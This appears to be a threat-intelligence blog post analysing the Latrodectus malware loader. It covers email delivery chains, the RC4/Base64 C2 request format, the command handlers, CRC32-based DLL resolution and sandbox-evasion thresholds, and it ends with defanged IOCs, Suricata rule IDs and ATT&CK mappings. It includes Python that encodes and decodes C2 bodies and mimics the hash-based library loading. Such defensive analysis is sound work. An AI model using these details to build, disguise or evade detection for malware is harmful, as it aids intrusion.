Latrodectus Loader

This research examines the distribution mechanisms, C2 traffic patterns, and functionality of Latrodectus loader.


Latrodectus is a loader first identified in October 2023 by researchers at Walmart. Walmart researchers identified a Latrodectus sample while investigating an IcedID campaign. Overlaps between IcedID and Latrodectus include: using the same network infrastructure, similar patterns in C2 traffic, and the DLL exports pointing to the same export function address. Recently, several different threat actors have been observed to use Latrodectus during intrusion campaigns where the primary delivery mechanism has been through email. Researchers at both Proofpoint and Palo Alto Networks’ Unit42 have reported that victims received emails containing links leading to the download and execution of Latrodectus samples. 

Figure 1. Pulsedive Latrodectus threat page

This blog provides an overview on distribution mechanisms, C2 traffic patterns, and the functionality of Latrodectus with the aim of highlighting core capabilities:

  • Obtaining new C2 domains
  • Running anti-analysis checks
  • Downloading and executing different file types
  • Collecting system information

How is it delivered?

Proofpoint’s Threat Research Team observed campaigns from two different threat actors using Latrodectus, TA577 and TA578. While the intrusion attempts by both actors start with email delivery, the intermediary steps taken to download Latrodectus samples differ slightly. 

Figure 2: Latrodectus infection chains for TA577 and TA578

TA577’s Delivery of Latrodectus

Proofpoint identified TA577, an initial access broker that previously used QBot extensively, as using Latrodectus in three separate intrusion campaigns in November 2023. TA577 starts intrusions by hijacking existing email threads and tricking victims into interacting with attachments or embedded links. In one of the campaigns, the actor avoided thread hijacking and instead sent emails containing links that downloaded a JavaScript file. The JavaScript file created and executed other scripts that in turn executed a Latrodectus DLL. In another campaign, the JavaScript file directly downloaded and executed Latrodectus instead of creating additional scripts. The group has also experimented with ISO files and LNK files as part of the infection chain. 

TA578’s Delivery of Latrodectus

TA578 is a threat actor that has previously used email to deliver malware such as Ursnif, BazaLoader and IcedID. In one of the TA578 campaigns, the threat actor impersonated companies and sent threats about copyright infringement. The email encouraged the recipient to follow a link in the message. The link redirected to a spoofed website for the company the threat actors were masquerading as, while a JavaScript file was downloaded in the background. When the JavaScript file was executed, it used msiexec.exe to run an MSI that was retrieved from a remote WebDAV share.

This sequence of events was also observed by Palo Alto Networks' Unit 42, which reported Latrodectus being used to drop Lumma Stealer onto victim devices.

Thread-hijacked email > link > redirect to fake Azure page > Firebase URL > .js file download > victim double-clicks JS file > wscript runs JS file > JS generates WebDAV traffic for MSI > MSI installs Latrodectus DLL > Latrodectus C2 > Lumma EXE sent over Latrodectus C2
Figure 3: Infection chain observed by Unit 42. Source: Twitter

C2 Communication

Latrodectus sends host information to its C2 servers in HTTP POST requests, with the fields joined together as key=value parameters. The information includes values used to uniquely identify the compromised host. The data is encrypted with RC4 and then Base64-encoded before being placed in the HTTP body. Researchers have observed that the RC4 key, 12345, has been reused across different samples, so captured bodies can be decrypted without access to the sample. 

An example of the HTTP POST request, shared by Elastic in a recent blog, is shown below. 

Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Host: aytobusesre.com
Content-Length: 256
Cache-Control: no-cache

M1pNDFh7flKrBaDJqAPvJ98BTFDZdSDWDD8o3bMJbpmu0qdYv0FCZ0u6GtKSN0g//WHAS2npR/HDoLtIKBgkLwyrIh/3EJ+UR/0EKhYUzgm9K4DotfExUiX9FBy/HeV7C4PgPDigm55zCU7O9kSADMtviAodjuRBVW3DJ2Pf5+pGH9SG1VI8bdmZg+6GQFpcFTGjdWVcrORkxBjCGq3Eiv2svt3+ZFIN126PcvN95YJ0ie1Puljfs3wqsW455V7
Figure 4: Initial Communication Observed by Elastic. The C2 responds with the command CLEARURL.

The decoded content of the HTTP POST request is:

counter=0&type=1&guid=249507485CA29F24F77B0F43D7BA&os=6&arch=1&username=user&group=510584660&ver=1.1&up=4&direction=aytobusesre.com&mac=00:0c:24:0e:29:85;&computername=DESKTOP-3C4ILHO&domain=

The table below shows the information sent back to the C2 server. 

Field          Description
counter        Count of HTTP requests made so far
type           Type of request (1 for registration, 3 for system information)
guid           Bot ID
os             Windows operating system version
arch           System architecture (1 for 64-bit)
username       Username
group          Campaign identifier
ver            Version string carried by the sample (1.1 in the example above)
up             Value from the sample
direction      C2 domain
mac            MAC address of the infected device
computername   Hostname of the infected device
domain         Domain the infected machine belongs to

The value of up is unique for different samples and the exact purpose of this value is unclear at this point. 
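The following Python is an added example, not Latrodectus code or code from any of the cited reports. It implements the body format described above (Base64 over RC4 with the static key 12345) in both directions and parses the resulting key=value fields. The ciphertext it works on is constructed here by encrypting the decoded request shown above, because the exact bytes of the original capture are not reproduced on this page; the RC4 routine is a plain textbook implementation and is an assumption about the sample's variant.

```python
"""Decode and parse a Latrodectus-style C2 POST body.

Body format as described above: Base64(RC4(key, "k=v&k=v...")).
Added example, not Latrodectus code. The ciphertext is constructed by
encrypting the decoded request from the page; it is not the Figure 4 capture.
"""
import base64

RC4_KEY = b"12345"  # static key reported as reused across samples

REQUEST_TYPES = {"1": "registration", "3": "system info"}  # from the field table

# Plaintext copied from the decoded request above (page data).
SAMPLE_PLAINTEXT = (
    "counter=0&type=1&guid=249507485CA29F24F77B0F43D7BA&os=6&arch=1"
    "&username=user&group=510584660&ver=1.1&up=4&direction=aytobusesre.com"
    "&mac=00:0c:24:0e:29:85;&computername=DESKTOP-3C4ILHO&domain="
)


def rc4(key: bytes, data: bytes) -> bytes:
    """Textbook RC4 (KSA + PRGA). Symmetric: the same call encrypts and decrypts.
    Assumption: the sample uses unmodified RC4 with this key."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def encode_body(plaintext: str, key: bytes = RC4_KEY) -> str:
    """Bot side: RC4-encrypt, then Base64, as the page describes the body."""
    return base64.b64encode(rc4(key, plaintext.encode("utf-8"))).decode("ascii")


def decode_body(body: str, key: bytes = RC4_KEY) -> str:
    """Analyst side: Base64-decode, then RC4-decrypt. A wrong key yields
    garbage rather than an exception, so the caller can try other keys."""
    return rc4(key, base64.b64decode(body)).decode("utf-8", errors="replace")


def parse_fields(plaintext: str) -> dict:
    """Split 'k=v&k=v' on '&' and on the first '=' only.
    urllib.parse.parse_qsl is deliberately avoided: it would turn the '+' in
    values such as 'Notepad++.lnk' (seen in the desktop-listing request later
    on the page) into spaces."""
    fields = {}
    for chunk in plaintext.split("&"):
        if not chunk:
            continue
        key, _, value = chunk.partition("=")
        fields[key] = value  # 'domain=' with no value is kept as ''
    return fields


def describe(fields: dict) -> str:
    """One-line summary an analyst can log per decoded request."""
    kind = REQUEST_TYPES.get(fields.get("type", ""), "unknown")
    return (f"{kind} request #{fields.get('counter', '?')} from bot "
            f"{fields.get('guid', '?')} ({fields.get('computername', '?')}) "
            f"to {fields.get('direction', '?')}")


# Constructed ciphertext (not the bytes from Figure 4).
SAMPLE_BODY = encode_body(SAMPLE_PLAINTEXT)

if __name__ == "__main__":
    decoded = decode_body(SAMPLE_BODY)
    print(decoded)
    print(describe(parse_fields(decoded)))
```

Because the key is static and the body is the only protection, a network sensor with the captured POST body can run decode_body directly; the same routine decodes the type=3 responses and the desktop-listing request shown further down, since they share the key=value layout.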

The C2 responds with one or more of the following commands (an example response is shown in Figure 5 below).

Cleartext Value   Description
CLEARURL          Removes all configured C2s
URLS              Sets a new C2
COMMAND           Command handler
ERROR             Reports an error to the bot

Proofpoint researchers shared an example of a response issued to an infected machine that included clearing existing C2s, setting new ones, and then collecting information from the device.

E3l9I35LXiOWKYHilDWuJoUOTU3NOyjNGnp3muFUOrabzvFw6FpoOQqdBZmsUV5E7FzXWHKgBafR6PcPckBsIB2vIhb3CZ/QHPoEO1hc0A++PpLQjpRWJkK3EFDxH/R5RYjhInO8hc0jTljC91GMVstjkxgQnuZLGBW6AV/gz4VrNMWUxFUtP4fdg/HKCREbRm+gIHkH/7Jc9Q==
Figure 5: Response issued by C2. Source: Proofpoint

Latrodectus Capabilities

When the C2 server responds with a COMMAND instruction, the response carries a numeric handler value that selects the action to execute. Each action is implemented by a dedicated handler, and the dispatcher compares the value that follows COMMAND against the table below to decide which handler runs.

The table below highlights the different commands the malware is capable of handling.

Handler Value   Description
2               Get list of files on the desktop
3               Get list of running processes
4               Collect system information
12              Run an .exe file
13              Execute a DLL via a named export
14              Execute a command via cmd.exe
15              Update and restart the bot
17              Terminate the Latrodectus process
18              Download and execute bp.dat
19              Increase the C2 beacon timeout
20              Reset the request counter variable

An example of the data collected from an infected host's desktop (handler 2) is:

counter=0&type=1&guid=249507485CA29F24F77B0F43D7BA&os=6&arch=1&username=user&group=510584660&ver=1.1&up=4&direction=aytobusesre.com&desklinks=["OneDrive.lnk","OneNote.lnk","PowerPoint.lnk","Notepad++.lnk","Excel.lnk","Google Chrome.lnk","Snipping Tool.lnk","Notepad.lnk","Paint.lnk"]

To retrieve the list of running processes, the malware uses the Windows API - CreateToolhelp32Snapshot.

Elastic researchers discovered that the bp.dat file is used to execute the IcedID payload using rundll32.exe.

Dynamic API Resolving

Similar to other malware, Latrodectus samples resolve APIs at runtime, so the import table seen during static analysis gives only a limited idea of the sample's functionality. To resolve additional APIs at runtime, the malware walks the Process Environment Block (PEB) to locate kernel32.dll and ntdll.dll. To load user32.dll and wininet.dll, the malware enumerates all DLLs in the Windows system directory, takes each file name and computes its CRC32 checksum. When the checksum matches a hash embedded in the sample, the malware loads that library with LoadLibraryW, so the DLL names never appear as strings in the binary. 

Figure 6: Resolution of DLLs using checksums. Source: Elastic
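The Python below is an added example, not Latrodectus code or code from Elastic, showing both sides of the checksum-based lookup described above: the malware side, which hashes every name in a directory listing and "loads" on a match, and the analyst side, which precomputes hashes of known DLL names so that constants pulled out of a sample can be mapped back to names. Everything specific is an assumption: the hash is standard zlib CRC32 over the lower-cased ASCII file name (a real sample may normalise case or encoding differently), the wanted-hash constants are computed at import time because the real ones are not reproduced on the page, and the directory listing is constructed rather than read from a live system.

```python
"""Checksum-based DLL resolution, as an added example (not Latrodectus code).

Assumptions: zlib CRC32 over the lower-cased ASCII name; hash constants are
computed here rather than taken from a sample; the directory listing is a
constructed stand-in for a walk of the Windows system directory.
"""
import zlib
from typing import Callable, Dict, Iterable


def name_hash(filename: str) -> int:
    # Assumption: plain CRC32 over the lower-cased name. A real sample may use
    # another case rule, a UTF-16 encoding or a modified CRC table.
    return zlib.crc32(filename.lower().encode("ascii")) & 0xFFFFFFFF


# What a sample would embed instead of strings (computed here, not extracted).
WANTED_HASHES: Dict[int, str] = {name_hash(n): n for n in ("user32.dll", "wininet.dll")}

# Constructed stand-in for a directory walk of C:\Windows\System32.
SYSTEM_DIR_LISTING = [
    "advapi32.dll", "KERNEL32.DLL", "ntdll.dll", "USER32.dll",
    "ws2_32.dll", "wininet.dll", "notepad.exe",
]


def resolve_by_hash(listing: Iterable[str], wanted: Dict[int, str],
                    load: Callable[[str], object] = lambda name: name) -> Dict[str, object]:
    """Malware side: hash each directory entry and 'load' it on a match.
    `load` stands in for LoadLibraryW; by default it just returns the entry,
    so the result shows which on-disk name satisfied which wanted hash."""
    loaded: Dict[str, object] = {}
    for entry in listing:
        h = name_hash(entry)
        if h in wanted and wanted[h] not in loaded:
            loaded[wanted[h]] = load(entry)
    return loaded


def build_lookup(candidates: Iterable[str]) -> Dict[int, str]:
    """Analyst side: precompute hashes for known DLL names so constants found
    in a binary can be mapped back to names without running the sample."""
    return {name_hash(c): c for c in candidates}


def identify_hash(value: int, lookup: Dict[int, str]) -> str:
    """Map a constant found in the binary back to a DLL name, or flag it."""
    return lookup.get(value & 0xFFFFFFFF, f"unknown (0x{value:08x})")


if __name__ == "__main__":
    print(resolve_by_hash(SYSTEM_DIR_LISTING, WANTED_HASHES))
    lookup = build_lookup(["user32.dll", "wininet.dll", "kernel32.dll"])
    for h in WANTED_HASHES:
        print(f"0x{h:08x} -> {identify_hash(h, lookup)}")
```

When the hashing rule is known, build_lookup over the names of every DLL in a clean System32 directory produces a table that turns the sample's constants back into import names; if nothing matches, the normalisation or CRC variant in name_hash is the first thing to revisit.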

Anti-Analysis Techniques

The sample leverages several anti-analysis techniques that make it harder to run under a debugger or in a sandbox. These techniques include:

  • Checking the BeingDebugged flag in the PEB
  • Checking the number of running processes against the operating system version, with a threshold that depends on the OS generation
    • On Windows 10, Windows 11 and Windows Server 2016, fewer than 75 running processes fails the check
    • On older versions (Windows Server 2003 R2, Windows XP, Windows 2000, Windows 7, Windows 8, Windows Server 2012/R2), fewer than 50 running processes fails the check
  • Checking if the process is running as a 32-bit application on a 64-bit operating system (WoW64)
  • Checking the MAC address of the device
    • The sample terminates if a valid MAC address is not found
Figure 7: Anti-analysis techniques used by Latrodectus.

Conclusion

Latrodectus is a newer loader that has been observed within the threat landscape and leveraged by multiple threat actors. The malware has notable overlaps with IcedID and adopts several anti-analysis techniques which make it difficult to detect and analyse. Latrodectus C2s can send commands over HTTP requests that instruct the malware to perform additional actions such as executing files, collecting system information, and terminating its own processes. 

Recommendations

  • Continued User Awareness Training
    • Latrodectus requires user execution. Continued user awareness training mitigates the risk posed by spam and malvertising by teaching users how these threats work and what to look out for. 
  • Ensure that security solutions have detections in place for activity associated with Latrodectus
    • Ensure that host-based logging solutions such as SIEM and EDR alert on rundll32.exe being used to download executables and on rundll32.exe initiating connections to public IP addresses. 
    • Proofpoint shared the following Suricata rules to detect Latrodectus network activity. 
      • 2048735 ET MALWARE Latrodectus Loader Related Activity (POST) 
      • 2049231 ET MALWARE Latrodectus Alive Request (GET) 
      • 2049232 ET MALWARE Latrodectus Alive Response M1 
      • 2049233 ET MALWARE Latrodectus 404 Response 
      • 2049700 ET MALWARE Latrodectus Alive Response M2 
      • 2049701 ET MALWARE Latrodectus Alive Response M3 
      • 2049702 ET MALWARE Latrodectus Alive Response M4 
      • 2049703 ET MALWARE Latrodectus Alive Response M5 
      • 2049704 ET MALWARE Latrodectus Alive Response M6 
      • 2049705 ET MALWARE Latrodectus Alive Response M7 
      • 2049706 ET MALWARE Latrodectus Alive Response M8 
      • 2051602 ET MALWARE Latrodectus Related Activity (POST) 

Indicators of Compromise

The table below contains a subset of 250+ Latrodectus network IoCs that have been identified, aggregated, and added to the Pulsedive platform. This data can be queried in Pulsedive using the Explore query threat=Latrodectus and is available for export in multiple formats (CSV, STIX 2.1, JSON).

Latrodectus IOCs

hxxps[://]zatracon[.]com/wp-content/plugins/share-private-fls/shared

hxxps[://]www[.]meilinhotels[.]com/wp-content/plugins/share-private-fls/shared

hxxps[://]www[.]darkknight-media[.]com/tasawer/wp-content/plugins/share-private-fls/shared

hxxps[://]zeemark[.]in/wp-content/plugins/share-private-fls/shared

hxxps[://]www[.]qi-code[.]com/wp-content/plugins/share-private-fls/shared

hxxps[://]zk1construction[.]com/wp-content/plugins/share-private-fls/shared

hxxps[://]www[.]tajimateknikservis[.]com/wp-content/plugins/share-private-fls/shared

hxxps[://]www[.]tatuhirdavat[.]com/wp-content/plugins/share-private-fls/shared

hxxps[://]illoskanawer[.]com/live/

hxxps[://]workspacin[.]cloud/live/

And more, retrieve all indicators here 

MITRE ATT&CK TTPs

Command and Control
  • Ingress Tool Transfer (T1105)

Defense Evasion
  • Obfuscated Files or Information (T1027)
  • Process Injection (T1055)
  • Indicator Removal: File Deletion (T1070.004)
  • System Binary Proxy Execution: Msiexec (T1218.007)
  • System Binary Proxy Execution: Rundll32 (T1218.011)
  • Virtualization/Sandbox Evasion (T1497)
  • Hijack Execution Flow: DLL Side-Loading (T1574.001)

Discovery
  • Process Discovery (T1057)
  • System Information Discovery (T1082)
  • File and Directory Discovery (T1083)
  • Virtualization/Sandbox Evasion (T1497)

Execution
  • Windows Management Instrumentation (T1047)
  • Scheduled Task/Job: Scheduled Task (T1053.005)
  • Command and Scripting Interpreter: Windows Command Shell (T1059.003)
  • Command and Scripting Interpreter: JavaScript (T1059.007)
  • User Execution: Malicious File (T1204.002)
  • System Binary Proxy Execution: Rundll32 (T1218.011)

Exfiltration
  • Exfiltration Over C2 Channel (T1041)

Initial Access
  • Phishing (T1566)

Persistence
  • Scheduled Task/Job: Scheduled Task (T1053.005)
  • Create or Modify System Process (T1543)
  • Hijack Execution Flow: DLL Side-Loading (T1574.001)

Privilege Escalation
  • Scheduled Task/Job: Scheduled Task (T1053.005)
  • Process Injection (T1055)
  • Create or Modify System Process (T1543)
  • Hijack Execution Flow: DLL Side-Loading (T1574.001)

References